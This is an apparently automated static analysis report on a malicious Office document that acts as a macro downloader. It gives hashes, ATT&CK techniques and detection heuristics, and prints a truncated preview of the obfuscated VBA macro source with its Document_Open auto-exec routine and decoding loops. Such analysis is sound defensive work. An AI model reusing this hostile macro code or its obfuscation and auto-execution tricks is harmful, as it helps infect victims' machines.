Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27010cddeb2f44c1…

MALICIOUS

Office (OLE)

Size: 86.0 KB
Created: 2016-06-20 19:00:00
First seen: 2019-04-18
MD5: 97fd2667ed84a0ee4d8ad67ce6cde3b0
SHA-1: 036804a315a9160c1d6c45dc1d66d947565672ef
SHA-256: 27010cddeb2f44c19138da5e5de616b1d6b9138aeffaace043ea2dda6b03745b
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is triggered when the document is opened, and it uses a Shell() call to execute an arbitrary command. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic for bypassing macro security. The VBA script itself is heavily obfuscated, but its execution via Shell() and the matching 'Doc.Downloader' ClamAV signature strongly indicate that it is a downloader.

Heuristics (7)

  • ClamAV: Doc.Downloader.Macrobe-9761291-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macrobe-9761291-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      40991 bytes
SHA-256:   4603e9e7a8ec13a28f83e3ef55806936f962b5eb257e0f50334def88ab595fca

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim ERHDyA() As Integer
Dim I0o5K(16544 - 7544) As Long, Y6Yb(8650 + 1349) As Long
Private Function VIx1(XE21h() As Byte) As String
Dim Yi1CkRG As Long
For Yi1CkRG = 0 To VV5DKvw(XE21h)
VIx1 = VIx1 & ROg(XE21h(Yi1CkRG))
Next Yi1CkRG
End Function
Private Function Fd0WS(Sw05 As Integer) As Byte()
Dim Ixs(1) As Byte, R3VSq As Long, HQe8sx As Byte
For R3VSq = 0 To 1
Ixs(R3VSq) = (Int(Sw05 / (2 ^ ((4547 - 4539) * (1 - R3VSq))))) And (-7488 + 7743)
Next R3VSq
ReDim Fd0WS(1) As Byte
For R3VSq = 0 To 1 \ 2
HQe8sx = Ixs(R3VSq)
Ixs(R3VSq) = Ixs(1 - R3VSq)
Ixs(1 - R3VSq) = HQe8sx
Next
Fd0WS = Ixs
End Function
Private Sub dOCumeNt_oPen()
On Error Resume Next
Dim F3b As Long, JVBC As Long, MjX4 As Long
F3b = 91267
For JVBC = 1 To F3b
MjX4 = MjX4 + 1
Next JVBC
If MjX4 = F3b Then
Dim Ph31Uf As Integer, Xw9aL As String
For Ph31Uf = 9 To 544
Xw9aL = Xw9aL + Ph31Uf
Next
JW
Else
LXok
End If
End Sub
Private Function OmuyRL(ByVal PAgiZ8 As String, ByVal MwLqfvz As Long, ByVal KB As Variant) As String
Dim D9w1cj() As Byte, FBYZ2L() As Byte, QSw As Long, SaQ As Long
D9w1cj = PAgiZ8
QSw = VV5DKvw(D9w1cj)
MwLqfvz = (MwLqfvz - 1) * 2
KB = (KB * 2) - 1
If MwLqfvz + KB > QSw Then KB = QSw - MwLqfvz
ReDim FBYZ2L(KB)
For SaQ = MwLqfvz To MwLqfvz + KB
FBYZ2L(SaQ - MwLqfvz) = D9w1cj(SaQ)
Next SaQ
OmuyRL = FBYZ2L
End Function
Private Function YbA(BlUNeVf, A1SoxK)
YbA = BlUNeVf - (A1SoxK * (BlUNeVf \ A1SoxK))
End Function
Private Function W20X(GWka, Khb2)
W20X = (GWka And Not Khb2) Or (Not GWka And Khb2)
End Function
Private Sub JW()
Dim RLl() As String, EQ As Integer
RLl = Split(UserForm1.Label1.Caption, ROg((5308 - 5264)))
ReDim ERHDyA(1981)
For EQ = 0 To 1981
ERHDyA(EQ) = RLl(EQ)
Next EQ
Dim XpO As String, El3MsB As Long, Jr As String, MYg As String, K9O0XX As String, K4N2 As String, OH As String, GE As String, GK2G() As Byte
Dim EC(10) As Byte, Fakuwy(32) As Byte
EC(0) = 233
EC(1) = 20
EC(2) = 247
EC(3) = 138
EC(4) = 194
EC(5) = 229
EC(6) = 237
EC(7) = 42
EC(8) = 8
EC(9) = 85
EC(10) = 194
Fakuwy(0) = 82
Fakuwy(1) = 89
Fakuwy(2) = 102
Fakuwy(3) = 67
Fakuwy(4) = 122
Fakuwy(5) = 70
Fakuwy(6) = 79
Fakuwy(7) = 107
Fakuwy(8) = 119
Fakuwy(9) = 105
Fakuwy(10) = 50
Fakuwy(11) = 122
Fakuwy(12) = 98
For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb)
Fakuwy(13) = GJvr9hf(El3MsB, 1)
Fakuwy(14) = GJvr9hf(El3MsB, 2)
Fakuwy(15) = GJvr9hf(El3MsB, 3)
Fakuwy(16) = GJvr9hf(El3MsB, 4)
Fakuwy(17) = Fakuwy(13)
Fakuwy(18) = Fakuwy(14)
Fakuwy(19) = Fakuwy(15)
Fakuwy(20) = Fakuwy(16)
Fakuwy(21) = Fakuwy(13)
Fakuwy(22) = Fakuwy(14)
Fakuwy(23) = Fakuwy(15)
Fakuwy(24) = Fakuwy(16)
Fakuwy(25) = Fakuwy(13)
Fakuwy(26) = Fakuwy(14)
Fakuwy(27) = Fakuwy(15)
Fakuwy(28) = Fakuwy(16)
Fakuwy(29) = Fakuwy(13)
Fakuwy(30) = Fakuwy(14)
Fakuwy(31) = Fakuwy(15)
Fakuwy(32) = Fakuwy(16)
If D9v4O(EC, Fakuwy) = "EloZVCCdMcm" Then Exit For
Next El3MsB
Dim PT1OE(11) As Byte, HcNSMZ(31) As Byte
PT1OE(0) = 248
PT1OE(1) = 161
PT1OE(2) = 170
PT1OE(3) = 35
PT1OE(4) = 120
PT1OE(5) = 31
PT1OE(6) = 65
PT1OE(7) = 127
PT1OE(8) = 7
PT1OE(9) = 172
PT1OE(10) = 244
PT1OE(11) = 4
HcNSMZ(0) = 66
HcNSMZ(1) = 113
HcNSMZ(2) = 104
HcNSMZ(3) = 82
HcNSMZ(4) = 55
HcNSMZ(5) = 73
HcNSMZ(6) = 88
HcNSMZ(7) = 87
HcNSMZ(8) = 50
HcNSMZ(9) = 66
HcNSMZ(10) = 97
HcNSMZ(11) = 99
For El3MsB = VV5DKvw(I0o5K) To VV5DKvw(Y6Yb)
HcNSMZ(12) = GJvr9hf(El3MsB, 1)
HcNSMZ(13) = GJvr9hf(El3MsB, 2)
HcNSMZ(14) = GJvr9hf(El3MsB, 3)
HcNSMZ(15) = GJvr9hf(El3MsB, 4)
HcNSMZ(16) = HcNSMZ(12)
HcNSMZ(17) = HcNSMZ(13)
HcNSMZ(18) = HcNSMZ(14)
HcNSMZ(19) = HcNSMZ(15)
HcNSMZ(20) = HcNSMZ(12)
HcNSMZ(21) = HcNSMZ(13)
HcNSMZ(22) = HcNSMZ(14)
HcNSMZ(23) = HcNSMZ(15)
HcNSMZ(24) = HcNSMZ(12)
HcNSMZ(25) = HcNSMZ(13)
HcNSMZ(26) = HcNSMZ(14)
H
... (truncated)